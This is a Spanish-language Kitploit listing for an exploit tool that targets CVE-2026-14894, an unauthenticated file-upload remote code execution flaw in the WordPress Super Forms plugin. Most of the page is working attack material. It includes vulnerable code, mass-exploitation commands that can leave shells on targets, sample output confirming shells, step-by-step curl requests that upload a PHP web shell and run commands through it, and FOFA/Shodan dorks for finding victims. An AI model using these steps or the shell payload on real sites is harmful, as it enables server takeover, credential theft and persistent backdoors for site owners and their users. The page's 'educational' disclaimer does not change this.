Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14894 — Super Forms Carga de Archivos No Autenticada RCE | CVSS 9.8 | Kitploit
Herramientas/GitHubGitHub/shinthink/cve-2026-14894
ReconocimientoGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms Carga de Archivos No Autenticada RCE | CVSS 9.8

111hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
Compartir

CVE-2026-14894 — Super Forms: RCE por subida de archivos no autenticada

Fuga de nonce → Subida datauristring → Ejecución de código


Descripción general

CVE-2026-14894 es una vulnerabilidad de subida arbitraria de archivos no autenticada de severidad crítica (CVSS 9.8) en el plugin de WordPress Super Forms – Drag & Drop Form Builder (de WebRehab) en versiones ≤ 6.3.313.

El manejador AJAX nopriv super_submit_form acepta subidas de archivos mediante envíos de formularios sin:

  1. Verificar que el usuario esté autenticado
  2. Validar el tipo o la extensión del archivo
  3. Comprobar el contenido MIME contra los bytes mágicos

La barrera del nonce se omite trivialmente: un manejador AJAX nopriv independiente (super_create_nonce) genera nonces válidos para cualquier visitante no autenticado.

Los atacantes suben archivos PHP arbitrarios mediante payloads datauristring codificados en Base64 que se escriben directamente en /wp-content/uploads/superforms/ con el nombre de archivo controlado por el atacante, lo que resulta en ejecución directa de código.

Versiones afectadas

VersiónEstado
≤ 6.3.313Vulnerable
6.3.314+Parcheada

Instalaciones activas: 600.000+
Descubierto por: andrea bocchetti vía Wordfence (7 de julio de 2026)


Mecanismo de la vulnerabilidad

Causa raíz

Tres comprobaciones de seguridad ausentes en el manejador de subida de archivos AJAX de Super Forms:

root@kitploit:~
// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // upload for anyone

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // no MIME validation
    $name = $file['value'];                             // no filename sanitization
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}

Omisión del nonce

root@kitploit:~
// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // returned to unauthenticated attacker
}

Flujo del ataque

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → Get valid nonce (no auth needed)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → Shell written to /wp-content/uploads/superforms/

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE confirmed

Instalación

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

Uso

root@kitploit:~
# Single target
python cve_2026_14894.py -t target.com

# Mass exploit
python cve_2026_14894.py -f targets.txt

# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt

# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup

# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug

Argumentos

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every HTTP request + stage in real-time
  -v, --verbose     Show detailed output

Prueba de concepto

Objetivo único

root@kitploit:~
$ python cve_2026_14894.py -t target.com --debug
root@kitploit:~
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s

Escaneo masivo

root@kitploit:~
  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12

Explotación manual

Paso 1 — Obtener nonce

root@kitploit:~
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Returns 96-char hex nonce

Paso 2 — Subir shell PHP

root@kitploit:~
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

Paso 3 — Ejecutar comandos

root@kitploit:~
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

Dork de FOFA

root@kitploit:~
body="wp-content/plugins/super-forms"

Shodan

root@kitploit:~
http.html:"super-forms"

Impacto

Una explotación exitosa permite la ejecución remota de código como el usuario del servidor web. A partir de ahí:

  • Extraer wp-config.php → credenciales de la base de datos
  • Acceder a todo el contenido de WordPress, usuarios y datos de plugins
  • Implementar backdoors persistentes
  • Moverse lateralmente hacia redes internas

Aviso legal

SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.

Este software está pensado para profesionales de la seguridad que realizan pruebas de penetración autorizadas, organizaciones que auditan su propia infraestructura e investigadores que estudian la explotación de vulnerabilidades.

El acceso no autorizado a sistemas informáticos es ilegal y puede violar:

  • Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesia: UU ITE Pasal 30 & 46
  • Unión Europea: Directiva 2013/40/UE
  • Reino Unido: Computer Misuse Act 1990

Los autores no asumen ninguna responsabilidad por el mal uso.


Referencias

RecursoEnlace
Aviso de Wordfence

Este proyecto no está afiliado con WebRehab ni Super Forms.

Descargar herramienta
wordfence.com
Aviso de IONIXionix.io
Entrada de NVDCVE-2026-14894
Investigadorandrea bocchetti